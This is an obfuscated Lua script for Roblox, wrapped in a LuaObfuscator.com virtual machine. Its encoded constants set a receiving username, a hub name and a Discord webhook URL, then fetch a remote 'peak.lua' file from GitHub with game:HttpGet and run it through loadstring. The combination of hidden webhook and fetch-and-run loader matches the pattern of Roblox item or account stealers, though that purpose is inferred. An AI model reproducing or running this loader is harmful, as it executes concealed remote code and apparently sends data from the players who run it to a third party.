--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then function v25()local v31=v24();local v32=v24();local v33=2 -1 ;local v34=(v21(v32,1,57 -37 ) * (((5 -2) -1)^(82 -50))) + v31 ;local v35=v21(v32,640 -(555 + 64) ,962 -(857 + 74) );local v36=((v21(v32,(1101 -501) -(367 + 201) )==(928 -(214 + 713))) and  -(1 + 0)) or (1 + 0 + 0) ;if (v35==(180 -(67 + 113))) then if (v34==(877 -(282 + 595))) then return v36 * (1637 -(1523 + 114)) ;else v35=1 + 0 ;v33=0 -0 ;end elseif (v35==(3112 -(68 + 997))) then return ((v34==0) and (v36 * ((1271 -(226 + (2001 -(892 + 65))))/0))) or (v36 * NaN) ;end return v8(v36,v35-(4454 -3431) ) * (v33 + (v34/(((283 -164) -(32 + 85))^(51 + 1)))) ;end v26=nil;function v26(v37)local v38;if  not v37 then v37=v24();if (v37==(0 + 0)) then return "";end end v38=v3(v16,v19,(v19 + v37) -(2 -1) );v19=v19 + v37 ;local v39={};for v68=1 + 0 , #v38 do v39[v68]=v2(v1(v3(v38,v68,v68)));end return v6(v39);end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v40)if (v1(v40,2)==79) then v20=v0(v3(v40,1,1));return "";else local v70=v2(v0(v40,16));if v20 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v70,v20);v20=nil;v77=1;end end else return v70;end end end);v21=nil;v18=1;end if (v18==1) then function v21(v41,v42,v43)if v43 then local v71=0;local v72;while true do if (v71==(0 -0)) then v72=(v41/((7 -5)^(v42-(953 -(802 + 150)))))%(((1 + 4) -3)^(((v43-(1 -0)) -(v42-(1 + 0))) + 1)) ;return v72-(v72%(998 -(915 + 82))) ;end end else local v73=(5 -3)^(v42-(1 + 0)) ;return (((v41%(v73 + v73))>=v73) and (1 -0)) or (1187 -((2424 -1355) + 118)) ;end end v22=nil;function v22()local v44=v1(v16,v19,v19);v19=v19 + 1 ;return v44;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v45,v46,v47)local v48=0;local v49;local v50;local v51;while true do if (v48==1) then v51=v45[3];return function(...)local v79=v49;local v80=v50;local v81=v51;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=4) then if (v92<=1) then if (v92>0) then local v109=0;local v110;while true do if (v109==0) then v110=v91[2];v89[v110](v89[v110 + 1 ]);break;end end else local v111=0;local v112;while true do if (v111==0) then v112=v91[2];v89[v112]=v89[v112](v13(v89,v112 + 1 ,v84));break;end end end elseif (v92<=2) then local v113;local v114,v115;local v116;local v117;v117=v91[2];v89[v117](v89[v117 + 1 ]);v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v47[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v47[v91[3]];v83=v83 + 1 ;v91=v79[v83];v117=v91[2];v116=v89[v91[3]];v89[v117 + 1 ]=v116;v89[v117]=v116[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v117=v91[2];v114,v115=v82(v89[v117](v13(v89,v117 + 1 ,v91[3])));v84=(v115 + v117) -1 ;v113=0;for v134=v117,v84 do local v135=0;while true do if (v135==0) then v113=v113 + 1 ;v89[v134]=v114[v113];break;end end end v83=v83 + 1 ;v91=v79[v83];v117=v91[2];v89[v117]=v89[v117](v13(v89,v117 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end elseif (v92==3) then v89[v91[2]]=v89[v91[3]][v91[4]];else do return;end end elseif (v92<=7) then if (v92<=5) then v89[v91[2]]=v91[3];elseif (v92>6) then local v142=0;local v143;while true do if (v142==0) then v143=nil;v89[v91[2]]=v47[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v89[v91[3]][v91[4]];v142=1;end if (v142==6) then v89[v91[2]]=v89[v91[3]][v91[4]];break;end if (4==v142) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v143=v91[2];v89[v143](v89[v143 + 1 ]);v142=5;end if (v142==3) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v89[v91[3]][v91[4]];v83=v83 + 1 ;v91=v79[v83];v142=4;end if (v142==2) then v143=v91[2];v89[v143](v89[v143 + 1 ]);v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v47[v91[3]];v142=3;end if (v142==1) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v142=2;end if (v142==5) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v47[v91[3]];v83=v83 + 1 ;v91=v79[v83];v142=6;end end else v89[v91[2]]=v47[v91[3]];end elseif (v92<=8) then local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==2) then for v157=v130,v84 do local v158=0;while true do if (v158==0) then v133=v133 + 1 ;v89[v157]=v131[v133];break;end end end break;end if (v129==0) then v130=v91[2];v131,v132=v82(v89[v130](v13(v89,v130 + 1 ,v91[3])));v129=1;end if (v129==1) then v84=(v132 + v130) -1 ;v133=0;v129=2;end end elseif (v92>9) then v89[v91[2]]();else local v146=v91[2];local v147=v89[v91[3]];v89[v146 + 1 ]=v147;v89[v146]=v147[v91[4]];end v83=v83 + 1 ;end end;end if (0==v48) then v49=v45[1];v50=v45[2];v48=1;end end end return v30(v29(),{},v17)(...);end if (4==v18) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (2==v52) then v57=nil;v58=nil;v52=3;end if (v52==(0 + 0)) then v53=396 -(115 + 281) ;v54=nil;v52=2 -1 ;end if (v52~=(1 + 0)) then else v55=nil;v56=nil;v52=4 -2 ;end if (v52==3) then v59=nil;while true do local v93=0;while true do if (v93~=0) then else local v101=0 -0 ;while true do if ((868 -(550 + 317))==v101) then v93=1;break;end if (v101~=0) then else if (v53~=(0 -0)) then else local v136=0 -0 ;local v137;while true do if (v136==(0 -0)) then v137=0;while true do if (v137==(287 -(134 + 151))) then v53=1;break;end if (v137==1) then local v185=1665 -(970 + 695) ;while true do if ((1 -0)~=v185) then else v137=1992 -(582 + 1408) ;break;end if (v185==0) then v56={};v57={v54,v55,nil,v56};v185=3 -2 ;end end end if (0==v137) then v54={};v55={};v137=1825 -(1195 + 629) ;end end break;end end end if (v53==2) then local v138=0;local v139;while true do if (0~=v138) then else v139=0;while true do local v182=0 -0 ;while true do if (v182~=(241 -(187 + 54))) then else if (v139==(781 -(162 + 618))) then return v57;end if (v139~=(0 + 0)) then else local v189=0;while true do if ((1 + 0)==v189) then v139=1 -0 ;break;end if (v189~=0) then else for v190=1,v24() do local v191=0 -0 ;local v192;local v193;local v194;while true do if (v191==0) then v192=0;v193=nil;v191=1;end if (v191==1) then v194=nil;while true do if (v192==1) then while true do if (v193~=0) then else v194=v22();if (v21(v194,1 + 0 ,1637 -(1373 + 263) )~=0) then else local v200=1000 -(451 + 549) ;local v201;local v202;local v203;local v204;local v205;while true do if (v200~=0) then else v201=0;v202=nil;v200=1 + 0 ;end if (v200~=2) then else v205=nil;while true do if (v201==2) then while true do if (v202==(4 -1)) then if (v21(v204,4 -1 ,1387 -(746 + 638) )==1) then v205[4]=v59[v205[2 + 2 ]];end v54[v190]=v205;break;end if (v202==(2 -0)) then local v209=341 -(218 + 123) ;while true do if (v209==0) then if (v21(v204,1582 -(1535 + 46) ,1)~=(1 + 0)) then else v205[1 + 1 ]=v59[v205[562 -(306 + 254) ]];end if (v21(v204,1 + 1 ,3 -1 )~=1) then else v205[3]=v59[v205[3]];end v209=1468 -(899 + 568) ;end if (v209==1) then v202=3;break;end end end if (v202~=(0 + 0)) then else local v210=0 -0 ;while true do if (v210~=0) then else v203=v21(v194,605 -(268 + 335) ,3);v204=v21(v194,4,6);v210=291 -(60 + 230) ;end if ((573 -(426 + 146))==v210) then v202=1 + 0 ;break;end end end if (v202==1) then local v211=1456 -(282 + 1174) ;local v212;while true do if (v211~=0) then else v212=0;while true do if (0==v212) then local v219=0;while true do if (v219~=(812 -(569 + 242))) then else v212=2 -1 ;break;end if (v219==0) then v205={v23(),v23(),nil,nil};if (v203==(1024 -(706 + 318))) then local v220=1251 -(721 + 530) ;local v221;while true do if (v220==(1271 -(945 + 326))) then v221=0 -0 ;while true do if (v221==0) then v205[3 + 0 ]=v23();v205[704 -(271 + 429) ]=v23();break;end end break;end end elseif (v203==(1 + 0)) then v205[1503 -(1408 + 92) ]=v24();elseif (v203==(1088 -(461 + 625))) then v205[3]=v24() -((1290 -(993 + 295))^16) ;elseif (v203==3) then local v226=0 + 0 ;while true do if (v226~=(1171 -(418 + 753))) then else v205[3]=v24() -(2^16) ;v205[2 + 2 ]=v23();break;end end end v219=1;end end end if (v212~=(1 + 0)) then else v202=2;break;end end break;end end end end break;end if (v201~=(1 + 0)) then else local v206=0 + 0 ;while true do if (v206==1) then v201=531 -(406 + 123) ;break;end if (v206==(1769 -(1749 + 20))) then v204=nil;v205=nil;v206=1;end end end if (v201==(0 + 0)) then local v207=0;while true do if (v207==1) then v201=1;break;end if (v207==0) then v202=0;v203=nil;v207=1323 -(1249 + 73) ;end end end end break;end if (v200==1) then v203=nil;v204=nil;v200=1 + 1 ;end end end break;end end break;end if (v192==0) then local v199=1145 -(466 + 679) ;while true do if (v199~=(0 -0)) then else v193=0;v194=nil;v199=1;end if (v199==(2 -1)) then v192=1901 -(106 + 1794) ;break;end end end end break;end end end for v195=1 + 0 ,v24() do v55[v195-(1 + 0) ]=v29();end v189=2 -1 ;end end end break;end end end break;end end end v101=2 -1 ;end end end if (v93~=1) then else if ((115 -(4 + 110))==v53) then v58=v24();v59={};for v103=585 -(57 + 527) ,v58 do local v104=0;local v105;local v106;local v107;local v108;while true do if (0==v104) then v105=0;v106=nil;v104=1;end if (v104~=1) then else v107=nil;v108=nil;v104=2;end if (v104~=2) then else while true do if (v105==(1427 -(41 + 1386))) then v106=103 -(17 + 86) ;v107=nil;v105=1;end if (v105~=(1 + 0)) then else v108=nil;while true do if (v106==1) then if (v107==1) then v108=v22()~=(0 -0) ;elseif (v107==(5 -3)) then v108=v25();elseif (v107~=(169 -(122 + 44))) then else v108=v26();end v59[v103]=v108;break;end if (v106~=0) then else local v187=0 -0 ;local v188;while true do if (v187==(0 -0)) then v188=0;while true do if (v188~=1) then else v106=1 + 0 ;break;end if (v188~=(0 + 0)) then else local v197=0 -0 ;while true do if (v197~=(66 -(30 + 35))) then else v188=1;break;end if (v197~=0) then else local v198=0;while true do if (v198==(1 + 0)) then v197=1;break;end if (v198==(1257 -(1043 + 214))) then v107=v22();v108=nil;v198=1;end end end end end end break;end end end end break;end end break;end end end v57[11 -8 ]=v22();v53=2;end break;end end end break;end end end v18=5;end if (v18==2) then function v23()local v60=1212 -(323 + 889) ;local v61;local v62;while true do if (v60==(1 + 0)) then return (v62 * (688 -432)) + v61 ;end if (v60==((619 + 363) -((868 -(20 + 830)) + 964))) then v61,v62=v1(v16,v19,v19 + (7 -5) );v19=v19 + 2 + 0 ;v60=581 -(361 + 219) ;end end end v24=nil;function v24()local v63=0 + (0 -0) ;local v64;local v65;local v66;local v67;while true do if (v63==(127 -(116 + 10))) then return (v67 * (1239276 + 15537940)) + (v66 * (66274 -(542 + (502 -306)))) + (v65 * (548 -(1843 -(1126 + 425)))) + v64 ;end if (v63==(0 + 0)) then v64,v65,v66,v67=v1(v16,v19,v19 + 3 );v19=v19 + 3 + 1 ;v63=1 + 0 ;end end end v25=nil;v18=3;end end end v15("LOL!0B3O0003013O004703083O00557365726E616D6503073O006967757874727703023O005F4703073O004875624E616D65030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O3332363537342O3938313330362O392F44647550695463375870355F79313042526C31434B426A3674433065526B4867724C564837727A6C44462D68652O7863753571484F4645324471555063683552306B6C59030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F6769746875622E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F626C6F622F6D61696E2F7065616B2E6C756100143O0012073O00013O00206O000200122O000100038O0002000100124O00043O00206O000500122O000100058O0002000100124O00043O00206O0006001205000100074O00023O0002000100124O00083O00122O000100093O00202O00010001000A00122O0003000B6O000100039O0000026O000100016O00017O00",v9(),...);end
